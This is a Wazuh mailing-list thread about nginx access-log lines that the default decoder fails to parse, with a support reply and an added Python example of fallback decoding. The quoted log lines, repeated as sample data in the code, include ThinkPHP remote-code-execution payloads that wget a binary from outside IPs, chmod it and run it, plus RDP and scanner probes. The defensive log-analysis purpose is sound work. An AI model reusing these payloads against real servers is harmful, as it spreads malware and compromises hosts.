Incomplete HTTP request in NGINX log is not decoded


Haekal

Sep 25, 2023, 12:53:07 AM
to Wazuh | Mailing List
I've configured Wazuh to monitor the nginx access.log file, but I've noticed that some logs are not captured by the Wazuh decoder and thus don't appear in the Wazuh web user interface. Below are some examples of these 'bad' logs:

```
9.12.57.140 - - [24/Sep/2023:11:19:08 +0700] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://135.148.104.21/bins/x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1" 400 166 "-" "Tsunami/2.0"
0.66.88.204 - - [24/Sep/2023:12:33:09 +0700] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 166 "-"
12.163.122.111 - - [24/Sep/2023:12:54:40 +0700] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://159.223.22.86/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 166 "-" "Uirusu/2.0"
0.66.88.204 - - [24/Sep/2023:15:02:13 +0700] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 166 "-" "-"
37.184.255.33 - - [24/Sep/2023:16:13:09 +0700] "MGLNDD_95.217.128.110_80" 400 166 "-" "-"   
```

Upon inspecting the `0375-web-accesslog_decoders.xml` file, I noticed that the above logs lack the HTTP method required to satisfy the prematch condition.

I have made a custom decoder to handle those exceptions, but is there a particular reason why Wazuh doesn't have a decoder for these logs in the first place?

Stuti Gupta

Sep 25, 2023, 1:14:46 AM
to Wazuh | Mailing List
Hi Haekal,
Hope you are doing well today, and thank you for using Wazuh.

Wazuh's default decoders are designed to be as generic as possible so that they can handle a wide range of log formats. However, this means that they may not be able to handle all possible log formats, especially those that are very specific or unusual. The logs that you have provided are examples of logs that are not handled by Wazuh's default decoders. These logs lack the HTTP method required to satisfy the prematch condition, which means that the decoders cannot identify them as Nginx access logs. Creating a decoder for every possible non-standard log entry would be impractical, as there can be an infinite number of variations. Therefore, Wazuh provides the flexibility for users to create custom decoders to handle their specific use cases. You have created a custom decoder to handle these logs, which is a good solution. 

For custom rules and decoders please refer to https://documentation.wazuh.com/current/user-manual/ruleset/custom.html

Hope this will help. Please feel free to contact us for any information/issues.

Regards,
Stuti Gupta
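As an added example (not Wazuh's decoder engine, and not code from either poster), the following Python models the two-stage decode this thread is about: a strict pattern modelled on the stock web-accesslog prematch (method, whitespace-free URL, `HTTP/x.y` token), and a fallback that keeps the surrounding access-log structure but accepts any request string, so the raw request can still be captured and alerted on. The malformed lines are the ones from the question above; the one "normal" line and the IP `203.0.113.5` are constructed. Wazuh decoders are written in XML with the OSSEC regex dialect, so these Python patterns are an illustration of the matching logic, not a drop-in decoder.

```python
import re

# Strict grammar modelled on the stock web-accesslog prematch: an HTTP method,
# a URL with no whitespace, then an "HTTP/x.y" token. A line whose request
# field breaks any of those assumptions never reaches the child decoders.
STRICT = re.compile(
    r'^(?P<srcip>\S+) \S+ \S+ \[(?P<timestamp>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) HTTP/\S+" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)"(?: "(?P<user_agent>[^"]*)")?'
)

# Fallback: same surrounding structure, any request string. nginx's default
# log escaping rewrites '"', '\' and non-printable bytes as \xNN (visible in
# the thread's lines as \x03, \x09 ...), so the request field can never hold a
# literal double quote and [^"]* is safe. The user-agent field is optional
# because some of the rejected lines end right after the referer.
FALLBACK = re.compile(
    r'^(?P<srcip>\S+) \S+ \S+ \[(?P<timestamp>[^\]]+)\] '
    r'"(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)"(?: "(?P<user_agent>[^"]*)")?'
)


def why_strict_failed(request: str) -> str:
    """Name the part of the strict request grammar the raw request violates."""
    parts = request.split(" ")
    if not re.fullmatch(r"[A-Z]+", parts[0]):
        return "no HTTP method"
    if not parts[-1].startswith("HTTP/"):
        return "no HTTP version"
    if len(parts) != 3:
        return "whitespace inside the URL"
    return "unknown"


def decode(line: str) -> dict:
    """Two-stage decode: strict first, then the raw-request fallback.

    The returned dict carries a 'decoder' key so a rule can key on which
    stage matched (the fallback name is a hypothetical choice for this example).
    """
    m = STRICT.match(line)
    if m:
        fields = m.groupdict()
        fields["decoder"] = "web-accesslog"
        return fields
    m = FALLBACK.match(line)
    if m:
        fields = m.groupdict()
        fields["decoder"] = "web-accesslog-raw"
        fields["reason"] = why_strict_failed(fields["request"])
        return fields
    return {"decoder": None}


# Constructed well-formed line first, then the five lines posted in the thread.
SAMPLE_LINES = [
    r'''203.0.113.5 - - [24/Sep/2023:11:20:00 +0700] "GET /index.html HTTP/1.1" 200 612 "-" "curl/8.1.2"''',
    r'''9.12.57.140 - - [24/Sep/2023:11:19:08 +0700] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://135.148.104.21/bins/x86 -O /tmp/.Fdp; chmod 777 /tmp/.Fdp; /tmp/.Fdp ThinkPHP.x86.Selfrep' HTTP/1.1" 400 166 "-" "Tsunami/2.0"''',
    r'''0.66.88.204 - - [24/Sep/2023:12:33:09 +0700] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 166 "-"''',
    r'''12.163.122.111 - - [24/Sep/2023:12:54:40 +0700] "GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://159.223.22.86/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1" 400 166 "-" "Uirusu/2.0"''',
    r'''0.66.88.204 - - [24/Sep/2023:15:02:13 +0700] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 166 "-" "-"''',
    r'''37.184.255.33 - - [24/Sep/2023:16:13:09 +0700] "MGLNDD_95.217.128.110_80" 400 166 "-" "-"''',
]


if __name__ == "__main__":
    for line in SAMPLE_LINES:
        d = decode(line)
        print(d["decoder"], d.get("srcip"), d.get("status"), d.get("reason", ""))
```

Running it shows the constructed line landing in the strict decoder and every line from the thread landing in the fallback, with the reason being either "no HTTP method" (the RDP-style and `MGLNDD_` probes) or "whitespace inside the URL" (the two `invokefunction` requests, which do start with `GET` but carry spaces in the query string). In Wazuh the same split is a second decoder whose `<prematch>` requires only the surrounding structure and whose `<regex>`/`<order>` capture `srcip`, the raw request, the status code and the user agent; giving it its own name lets a rule alert on these 400-status lines instead of silently dropping them.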